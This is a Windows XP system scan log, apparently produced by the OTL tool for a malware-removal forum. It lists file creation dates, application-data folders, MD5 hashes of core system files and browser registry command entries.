[2011/10/19 20:54:03 | 000,017,176 | ---- | C] () -- C:\WINDOWS\hpomdl04.dat
[2011/10/19 16:12:36 | 000,103,511 | ---- | C] () -- C:\WINDOWS\hpoins04.dat.temp
[2011/10/19 16:12:36 | 000,017,176 | ---- | C] () -- C:\WINDOWS\hpomdl04.dat.temp
[2010/12/20 18:27:49 | 000,000,171 | ---- | C] () -- C:\WINDOWS\System32\MRT.INI
[2010/10/22 18:49:43 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\Owner\Local Settings\Application Data\prvlcl.dat
[2010/10/18 00:32:36 | 000,001,324 | ---- | C] () -- C:\WINDOWS\System32\d3d9caps.dat
[2009/12/23 17:13:03 | 000,016,384 | ---- | C] () -- C:\WINDOWS\System32\FileOps.exe
[2009/12/20 19:42:18 | 000,000,314 | ---- | C] () -- C:\WINDOWS\primopdf.ini
[2009/05/30 09:25:34 | 000,116,841 | ---- | C] () -- C:\WINDOWS\hpqins00.dat
[2009/01/28 18:13:14 | 000,000,000 | ---- | C] () -- C:\WINDOWS\hpqEmlSz.INI
[2009/01/03 14:02:57 | 000,012,054 | R--- | C] () -- C:\WINDOWS\hpwscr20.dat
[2008/08/03 15:43:49 | 000,000,051 | ---- | C] () -- C:\WINDOWS\iTouch.ini
[2008/07/09 07:34:50 | 000,394,752 | ---- | C] () -- C:\WINDOWS\System32\diarbp32.exe
[2008/05/25 13:48:56 | 000,000,041 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\.zreglib
[2008/04/30 08:57:22 | 000,000,310 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\APUSet.xml
[2008/04/30 08:57:21 | 000,006,467 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\PrimoPDFSet.xml
[2008/04/30 08:52:10 | 000,176,235 | ---- | C] () -- C:\WINDOWS\System32\Primomonnt.dll
[2008/02/20 20:05:44 | 003,596,288 | ---- | C] () -- C:\WINDOWS\System32\qt-dx331.dll
[2007/12/23 06:30:34 | 000,000,374 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\internaldb6334.dat
[2007/12/23 06:30:27 | 000,000,183 | ---- | C] () -- C:\WINDOWS\wininit.ini
[2007/12/23 06:30:25 | 000,000,555 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\internaldb8467.dat
[2007/12/23 06:30:24 | 000,018,432 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\internaldb41.dat
[2007/11/21 15:58:51 | 000,007,680 | ---- | C] () -- C:\Documents and Settings\Owner\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2007/10/16 11:03:54 | 000,001,522 | ---- | C] () -- C:\WINDOWS\mozver.dat
[2007/10/16 11:02:03 | 000,000,000 | ---- | C] () -- C:\WINDOWS\nsreg.dat
[2007/10/15 07:03:33 | 000,002,154 | ---- | C] () -- C:\WINDOWS\System32\mshrml.ini
[2007/10/15 07:03:32 | 000,002,158 | ---- | C] () -- C:\WINDOWS\System32\ssmute.ini
[2007/10/15 07:03:05 | 000,001,185 | ---- | C] () -- C:\WINDOWS\System32\imbrmute.ini
[2007/10/15 06:17:11 | 000,000,121 | ---- | C] () -- C:\WINDOWS\cdplayer.ini
[2007/10/13 07:01:19 | 000,060,928 | ---- | C] () -- C:\WINDOWS\unleap.exe
[2007/10/13 06:30:08 | 000,204,800 | ---- | C] () -- C:\WINDOWS\System32\IVIresizeW7.dll
[2007/10/13 06:30:08 | 000,200,704 | ---- | C] () -- C:\WINDOWS\System32\IVIresizeA6.dll
[2007/10/13 06:30:08 | 000,192,512 | ---- | C] () -- C:\WINDOWS\System32\IVIresizeP6.dll
[2007/10/13 06:30:08 | 000,192,512 | ---- | C] () -- C:\WINDOWS\System32\IVIresizeM6.dll
[2007/10/13 06:30:08 | 000,188,416 | ---- | C] () -- C:\WINDOWS\System32\IVIresizePX.dll
[2007/10/13 06:30:08 | 000,020,480 | ---- | C] () -- C:\WINDOWS\System32\IVIresize.dll
[2007/10/13 06:18:10 | 000,156,160 | ---- | C] () -- C:\WINDOWS\System32\RTLCPAPI.dll
[2007/10/13 06:07:14 | 000,673,088 | ---- | C] () -- C:\WINDOWS\System32\mlang.dat
[2007/10/13 06:07:14 | 000,046,258 | ---- | C] () -- C:\WINDOWS\System32\mib.bin
[2007/10/13 06:06:07 | 000,218,003 | ---- | C] () -- C:\WINDOWS\System32\dssec.dat
[2007/10/13 06:05:13 | 000,001,804 | ---- | C] () -- C:\WINDOWS\System32\dcache.bin
[2007/10/13 05:33:56 | 000,272,128 | ---- | C] () -- C:\WINDOWS\System32\perfi009.dat
[2007/10/13 05:33:56 | 000,028,626 | ---- | C] () -- C:\WINDOWS\System32\perfd009.dat
[2007/10/13 05:33:53 | 000,004,490 | ---- | C] () -- C:\WINDOWS\System32\oembios.dat
[2007/10/13 05:33:47 | 013,107,200 | ---- | C] () -- C:\WINDOWS\System32\oembios.bin
[2007/10/13 05:33:41 | 000,000,741 | ---- | C] () -- C:\WINDOWS\System32\noise.dat
[2004/08/02 13:20:40 | 000,004,569 | ---- | C] () -- C:\WINDOWS\System32\secupd.dat
[2004/05/13 00:11:55 | 000,000,061 | ---- | C] () -- C:\WINDOWS\smscfg.ini
[2004/05/12 18:44:01 | 000,000,451 | ---- | C] () -- C:\WINDOWS\VGAsetup.ini
[2004/05/12 18:44:01 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\VGAunistlog.ini
[2004/05/12 06:25:14 | 000,028,672 | ---- | C] () -- C:\WINDOWS\System32\JAWTAccessBridge.dll
[2004/05/12 06:24:54 | 000,086,016 | ---- | C] () -- C:\WINDOWS\System32\PcdrKernelModeServices.dll
[2004/05/12 06:24:54 | 000,065,536 | ---- | C] () -- C:\WINDOWS\System32\ProgressTrace.dll
[2004/05/12 06:23:18 | 000,000,128 | ---- | C] () -- C:\Documents and Settings\Owner\Local Settings\Application Data\fusioncache.dat
[2004/05/12 06:21:36 | 000,167,936 | ---- | C] () -- C:\WINDOWS\System32\PCDrJNI_1_1.dll
[2004/05/12 06:10:10 | 000,090,112 | R--- | C] () -- C:\WINDOWS\bwUnin-6.2.3.66.exe
[2004/05/12 06:06:40 | 000,028,764 | ---- | C] () -- C:\WINDOWS\System32\CHODDI.SYS
[2004/05/12 06:06:00 | 000,045,056 | ---- | C] () -- C:\WINDOWS\System32\hpreg.dll
[2004/05/12 05:19:44 | 000,000,376 | ---- | C] () -- C:\WINDOWS\ODBC.INI
[2004/05/12 05:10:15 | 000,000,907 | ---- | C] () -- C:\WINDOWS\QUICKEN.INI
[2004/05/12 03:46:44 | 000,006,848 | ---- | C] () -- C:\WINDOWS\System32\hphmon05.dat
[2004/05/12 03:46:41 | 000,018,341 | ---- | C] () -- C:\WINDOWS\HPHins01.dat
[2004/05/12 03:46:41 | 000,004,308 | ---- | C] () -- C:\WINDOWS\hphmdl01.dat
[2004/05/12 03:34:12 | 000,015,502 | ---- | C] () -- C:\WINDOWS\hpdins01.dat
[2004/05/12 03:34:12 | 000,000,000 | ---- | C] () -- C:\WINDOWS\hpzmdl01.dat
[2004/05/12 03:27:46 | 000,016,306 | ---- | C] () -- C:\WINDOWS\hpqins01.dat
[2004/05/12 03:27:46 | 000,002,673 | ---- | C] () -- C:\WINDOWS\hpimdl01.dat
[2004/05/12 03:21:08 | 000,001,793 | ---- | C] () -- C:\WINDOWS\System32\fxsperf.ini
[2004/05/12 03:14:36 | 000,001,040 | ---- | C] () -- C:\WINDOWS\System32\drivers\alcxinit.dat
[2004/05/12 03:10:51 | 000,065,536 | ---- | C] () -- C:\WINDOWS\System32\sis760.bin
[2004/05/12 03:10:51 | 000,065,536 | ---- | C] () -- C:\WINDOWS\System32\sis741.bin
[2004/05/12 03:10:51 | 000,049,152 | ---- | C] () -- C:\WINDOWS\System32\sis660.bin
[2004/05/12 01:14:25 | 000,363,520 | ---- | C] () -- C:\WINDOWS\System32\psisdecd.dll
[2004/05/12 01:02:57 | 000,299,073 | ---- | C] () -- C:\WINDOWS\System32\PythonCOM22.dll
[2004/05/12 01:02:57 | 000,065,536 | ---- | C] () -- C:\WINDOWS\System32\PyWinTypes22.dll
[2004/05/12 01:00:16 | 000,016,896 | ---- | C] () -- C:\WINDOWS\System32\bcbmm.dll
[2004/05/12 00:28:30 | 000,000,802 | ---- | C] () -- C:\WINDOWS\orun32.ini
[2004/05/12 00:27:04 | 000,002,048 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2004/05/12 00:24:04 | 000,021,640 | ---- | C] () -- C:\WINDOWS\System32\emptyregdb.dat
[2004/05/12 00:16:45 | 000,000,549 | ---- | C] () -- C:\WINDOWS\System32\oeminfo.ini
[2004/05/12 00:16:31 | 000,472,854 | ---- | C] () -- C:\WINDOWS\System32\perfh009.dat
[2004/05/12 00:16:31 | 000,079,394 | ---- | C] () -- C:\WINDOWS\System32\perfc009.dat
[2004/05/11 17:20:40 | 000,004,161 | ---- | C] () -- C:\WINDOWS\ODBCINST.INI
[2004/05/11 17:19:57 | 000,186,608 | ---- | C] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2003/05/15 22:15:18 | 000,225,209 | ---- | C] () -- C:\WINDOWS\System32\C9930A.bin
[2003/03/06 23:53:16 | 000,012,288 | ---- | C] () -- C:\WINDOWS\System32\hpnvr82.dll
[2003/01/07 14:05:08 | 000,002,695 | ---- | C] () -- C:\WINDOWS\System32\OUTLPERF.INI

========== Custom Scans ==========

< DRIVES >

< %SYSTEMDRIVE%\*.exe >

< %systemroot%\assembly\GAC_32\*.ini >

< %systemroot%\assembly\GAC_64\*.ini >

< %SYSTEMDRIVE%\*.exe >

< %ALLUSERSPROFILE%\Application Data\*.exe >

< %APPDATA%\*. >
[2013/01/18 20:20:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Adobe
[2008/05/30 05:31:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\AdobeUM
[2008/06/17 15:51:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Apple Computer
[2010/10/17 10:06:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\AVG10
[2010/12/04 18:22:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Azureus
[2007/10/20 13:53:44 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Ceedo
[2012/12/04 18:47:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Common Files
[2008/05/25 12:50:27 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DAEMON Tools
[2008/05/25 12:41:55 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DAEMON Tools Pro
[2011/12/20 09:27:09 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DDMSettings
[2010/06/07 14:41:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DivX
[2008/09/17 19:14:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DNA
[2007/10/13 15:04:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Google
[2009/03/01 09:40:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Help
[2012/12/04 18:47:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\HP
[2010/10/23 21:57:39 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\HPAppData
[2007/10/13 08:22:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Identities
[2010/11/25 20:18:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Idew
[2007/10/15 07:03:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\InterMute
[2008/08/03 16:02:23 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\InterVideo
[2008/04/17 12:02:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Leadertech
[2007/10/13 06:44:51 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Macromedia
[2008/04/20 21:06:15 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\MagicEffect Photo
[2010/10/25 21:59:08 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Malwarebytes
[2010/10/27 20:47:04 | 000,000,000 | --SD | M] -- C:\Documents and Settings\Owner\Application Data\Microsoft
[2011/03/15 09:49:04 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Motive
[2008/08/27 05:09:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Mozilla
[2010/10/28 07:37:55 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\MSN6
[2008/02/08 15:39:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\MSNInstaller
[2010/11/13 08:37:49 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\PrimoPDF
[2008/07/25 09:35:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Roxio
[2010/05/01 14:54:25 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Safer Networking
[2004/05/12 06:05:09 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\SampleView
[2007/10/13 06:51:17 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\SmartFTP
[2004/05/12 01:27:05 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Sun
[2013/01/14 14:12:03 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\SUPERAntiSpyware.com
[2004/05/12 23:57:50 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Symantec
[2009/02/09 23:37:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Template
[2010/12/22 19:11:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\WinPatrol
[2008/03/25 20:16:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Yahoo!

< MD5 for: ATAPI.SYS >
[2002/08/29 13:00:00 | 010,158,890 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp1.cab:atapi.sys
[2004/08/04 00:05:44 | 018,738,937 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:atapi.sys
[2008/10/17 11:04:56 | 023,852,652 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:atapi.sys
[2002/08/29 06:00:00 | 010,158,890 | ---- | M] () .cab file -- C:\WINDOWS\I386\sp1.cab:atapi.sys
[2004/08/04 00:05:44 | 018,738,937 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp2.cab:atapi.sys
[2008/10/17 11:04:56 | 023,852,652 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp3.cab:atapi.sys
[2004/06/14 10:27:06 | 000,086,912 | ---- | M] (Microsoft Corporation) MD5=95B858761A00E1D4F81F79A0DA019ACA -- C:\WINDOWS\$NtUninstallQ331958$\atapi.sys
[2008/04/13 12:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ERDNT\cache\atapi.sys
[2008/04/13 12:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ServicePackFiles\i386\atapi.sys
[2008/04/13 12:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\system32\drivers\atapi.sys
[2004/08/03 21:59:44 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\$NtServicePackUninstall$\atapi.sys

< MD5 for: CSRSS.EXE >
[2008/04/13 18:12:15 | 000,006,144 | ---- | M] (Microsoft Corporation) MD5=44F275C64738EA2056E3D9580C23B60F -- C:\WINDOWS\ServicePackFiles\i386\csrss.exe
[2008/04/13 18:12:15 | 000,006,144 | ---- | M] (Microsoft Corporation) MD5=44F275C64738EA2056E3D9580C23B60F -- C:\WINDOWS\system32\csrss.exe
[2004/08/03 23:56:50 | 000,006,144 | ---- | M] (Microsoft Corporation) MD5=F12B178B1678D778CFD3FF1FC38C71FB -- C:\WINDOWS\$NtServicePackUninstall$\csrss.exe

< MD5 for: EXPLORER.EXE >
[2008/04/13 18:12:19 | 001,033,728 | ---- | M] (Microsoft Corporation) MD5=12896823FB95BFB3DC9B46BCAEDC9923 -- C:\WINDOWS\ERDNT\cache\explorer.exe
[2008/04/13 18:12:19 | 001,033,728 | ---- | M] (Microsoft Corporation) MD5=12896823FB95BFB3DC9B46BCAEDC9923 -- C:\WINDOWS\explorer.exe
[2008/04/13 18:12:19 | 001,033,728 | ---- | M] (Microsoft Corporation) MD5=12896823FB95BFB3DC9B46BCAEDC9923 -- C:\WINDOWS\ServicePackFiles\i386\explorer.exe
[2007/06/13 05:26:03 | 001,033,216 | ---- | M] (Microsoft Corporation) MD5=7712DF0CDDE3A5AC89843E61CD5B3658 -- C:\WINDOWS\$hf_mig$\KB938828\SP2QFE\explorer.exe
[2007/06/13 04:23:07 | 001,033,216 | ---- | M] (Microsoft Corporation) MD5=97BD6515465659FF8F3B7BE375B2EA87 -- C:\WINDOWS\$NtServicePackUninstall$\explorer.exe
[2004/08/03 23:56:50 | 001,032,192 | ---- | M] (Microsoft Corporation) MD5=A0732187050030AE399B241436565E64 -- C:\WINDOWS\$NtUninstallKB938828$\explorer.exe

< MD5 for: MSWSOCK.DLL >
[2008/06/20 11:41:10 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=097722F235A1FB698BF9234E01B52637 -- C:\WINDOWS\$NtServicePackUninstall$\mswsock.dll
[2008/06/20 11:36:11 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=1DFCA7713EA5A70D5D93B436AEA0317A -- C:\WINDOWS\$hf_mig$\KB951748\SP2QFE\mswsock.dll
[2004/08/03 23:56:46 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=4E74AF063C3271FBEA20DD940CFD1184 -- C:\WINDOWS\$NtUninstallKB951748_0$\mswsock.dll
[2008/06/20 11:46:57 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=832E4DD8964AB7ACC880B2837CB1ED20 -- C:\WINDOWS\$hf_mig$\KB951748\SP3GDR\mswsock.dll
[2008/06/20 11:46:57 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=832E4DD8964AB7ACC880B2837CB1ED20 -- C:\WINDOWS\$NtUninstallKB2509553$\mswsock.dll
[2008/06/20 10:02:47 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=943337D786A56729263071623BBB9DE5 -- C:\WINDOWS\ERDNT\cache\mswsock.dll
[2008/06/20 10:02:47 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=943337D786A56729263071623BBB9DE5 -- C:\WINDOWS\system32\dllcache\mswsock.dll
[2008/06/20 10:02:47 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=943337D786A56729263071623BBB9DE5 -- C:\WINDOWS\system32\mswsock.dll
[2008/04/13 18:12:01 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=B4138E99236F0F57D4CF49BAE98A0746 -- C:\WINDOWS\$NtUninstallKB951748$\mswsock.dll
[2008/04/13 18:12:01 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=B4138E99236F0F57D4CF49BAE98A0746 -- C:\WINDOWS\ServicePackFiles\i386\mswsock.dll
[2008/06/20 11:43:05 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=FCEE5FCB99F7C724593365C706D28388 -- C:\WINDOWS\$hf_mig$\KB2509553\SP3QFE\mswsock.dll
[2008/06/20 11:43:05 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=FCEE5FCB99F7C724593365C706D28388 -- C:\WINDOWS\$hf_mig$\KB951748\SP3QFE\mswsock.dll

< MD5 for: NWPROVAU.DLL >
[2008/04/13 18:12:02 | 000,142,336 | ---- | M] (Microsoft Corporation) MD5=06E587F41466569F32BEAAC7260E8AEC -- C:\WINDOWS\ServicePackFiles\i386\nwprovau.dll
[2008/04/13 18:12:02 | 000,142,336 | ---- | M] (Microsoft Corporation) MD5=06E587F41466569F32BEAAC7260E8AEC -- C:\WINDOWS\system32\nwprovau.dll
[2006/10/13 06:41:38 | 000,142,336 | ---- | M] (Microsoft Corporation) MD5=808CB47D7F6BE51B0354CD628CF45978 -- C:\WINDOWS\$hf_mig$\KB923980\SP2QFE\nwprovau.dll
[2006/10/13 06:35:12 | 000,142,336 | ---- | M] (Microsoft Corporation) MD5=AEEB687B865E1BAB04BB9C3604F92CEF -- C:\WINDOWS\$NtServicePackUninstall$\nwprovau.dll
[2004/08/03 23:56:46 | 000,144,384 | ---- | M] (Microsoft Corporation) MD5=F01D97A8E0380BA52F58249A7B3BD7F1 -- C:\WINDOWS\$NtUninstallKB923980$\nwprovau.dll

< MD5 for: PNRPNSP.DLL >
[2004/08/03 23:56:46 | 000,048,640 | ---- | M] (Microsoft Corporation) MD5=74D3620D2E63489975E3956A40DDD35F -- C:\WINDOWS\$NtServicePackUninstall$\pnrpnsp.dll
[2008/04/13 18:12:02 | 000,058,880 | ---- | M] (Microsoft Corporation) MD5=AF1449AC1D79D37C7026C1D8912DDA8E -- C:\WINDOWS\ServicePackFiles\i386\pnrpnsp.dll
[2008/04/13 18:12:02 | 000,058,880 | ---- | M] (Microsoft Corporation) MD5=AF1449AC1D79D37C7026C1D8912DDA8E -- C:\WINDOWS\system32\pnrpnsp.dll

< MD5 for: SERVICES.EXE >
[2009/02/06 05:06:24 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=020CEAAEDC8EB655B6506B8C70D53BB6 -- C:\WINDOWS\$hf_mig$\KB956572\SP3QFE\services.exe
[2008/04/13 18:12:34 | 000,108,544 | ---- | M] (Microsoft Corporation) MD5=0E776ED5F7CC9F94299E70461B7B8185 -- C:\WINDOWS\$NtUninstallKB956572$\services.exe
[2008/04/13 18:12:34 | 000,108,544 | ---- | M] (Microsoft Corporation) MD5=0E776ED5F7CC9F94299E70461B7B8185 -- C:\WINDOWS\ServicePackFiles\i386\services.exe
[2009/02/06 05:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\WINDOWS\ERDNT\cache\services.exe
[2009/02/06 05:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\WINDOWS\system32\dllcache\services.exe
[2009/02/06 05:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\WINDOWS\system32\services.exe
[2004/08/03 23:56:56 | 000,108,032 | ---- | M] (Microsoft Corporation) MD5=C6CE6EEC82F187615D1002BB3BB50ED4 -- C:\WINDOWS\$NtServicePackUninstall$\services.exe

< MD5 for: SVCHOST.EXE >
[2012/12/14 16:49:28 | 000,216,424 | ---- | M] () MD5=22101A85B3CA2FE2BE05FE9A61A7A83D -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\svchost.exe
[2008/04/13 18:12:36 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=27C6D03BCDB8CFEB96B716F3D8BE3E18 -- C:\WINDOWS\ERDNT\cache\svchost.exe
[2008/04/13 18:12:36 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=27C6D03BCDB8CFEB96B716F3D8BE3E18 -- C:\WINDOWS\ServicePackFiles\i386\svchost.exe
[2008/04/13 18:12:36 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=27C6D03BCDB8CFEB96B716F3D8BE3E18 -- C:\WINDOWS\system32\svchost.exe
[2004/08/03 23:56:58 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=8F078AE4ED187AAABC0A305146DE6716 -- C:\WINDOWS\$NtServicePackUninstall$\svchost.exe

< MD5 for: USERINIT.EXE >
[2004/08/03 23:56:58 | 000,024,576 | ---- | M] (Microsoft Corporation) MD5=39B1FFB03C2296323832ACBAE50D2AFF -- C:\WINDOWS\$NtServicePackUninstall$\userinit.exe
[2008/04/13 18:12:38 | 000,026,112 | ---- | M] (Microsoft Corporation) MD5=A93AEE1928A9D7CE3E16D24EC7380F89 -- C:\WINDOWS\ERDNT\cache\userinit.exe
[2008/04/13 18:12:38 | 000,026,112 | ---- | M] (Microsoft Corporation) MD5=A93AEE1928A9D7CE3E16D24EC7380F89 -- C:\WINDOWS\ServicePackFiles\i386\userinit.exe
[2008/04/13 18:12:38 | 000,026,112 | ---- | M] (Microsoft Corporation) MD5=A93AEE1928A9D7CE3E16D24EC7380F89 -- C:\WINDOWS\system32\userinit.exe

< MD5 for: WINLOGON.EXE >
[2004/08/03 23:56:58 | 000,502,272 | ---- | M] (Microsoft Corporation) MD5=01C3346C241652F43AED8E2149881BFE -- C:\WINDOWS\$NtServicePackUninstall$\winlogon.exe
[2012/12/14 16:49:28 | 000,216,424 | ---- | M] () MD5=22101A85B3CA2FE2BE05FE9A61A7A83D -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\winlogon.exe
[2008/04/13 18:12:39 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\WINDOWS\ERDNT\cache\winlogon.exe
[2008/04/13 18:12:39 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\WINDOWS\ServicePackFiles\i386\winlogon.exe
[2008/04/13 18:12:39 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\WINDOWS\system32\winlogon.exe

< MD5 for: WINRNR.DLL >
[2004/08/03 23:56:48 | 000,016,896 | ---- | M] (Microsoft Corporation) MD5=2C8FDB176F22629EA5342DB474FAC391 -- C:\WINDOWS\$NtServicePackUninstall$\winrnr.dll
[2008/04/13 18:12:09 | 000,016,896 | ---- | M] (Microsoft Corporation) MD5=D72B9EC3337B247A666F098F3D6B43DE -- C:\WINDOWS\ServicePackFiles\i386\winrnr.dll
[2008/04/13 18:12:09 | 000,016,896 | ---- | M] (Microsoft Corporation) MD5=D72B9EC3337B247A666F098F3D6B43DE -- C:\WINDOWS\system32\winrnr.dll

< %systemroot%\*. /mp /s >

< hklm\software\clients\startmenuinternet|command /rs >
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\chrome.exe\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2013/01/10 21:16:06 | 000,864,768 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2013/01/10 21:16:06 | 000,864,768 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2013/01/10 21:16:06 | 000,864,768 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: C:\Program Files\Mozilla Firefox\firefox.exe [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -preferences [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ReinstallCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --make-default-browser [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\HideIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --hide-icons [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ShowIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --show-icons [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
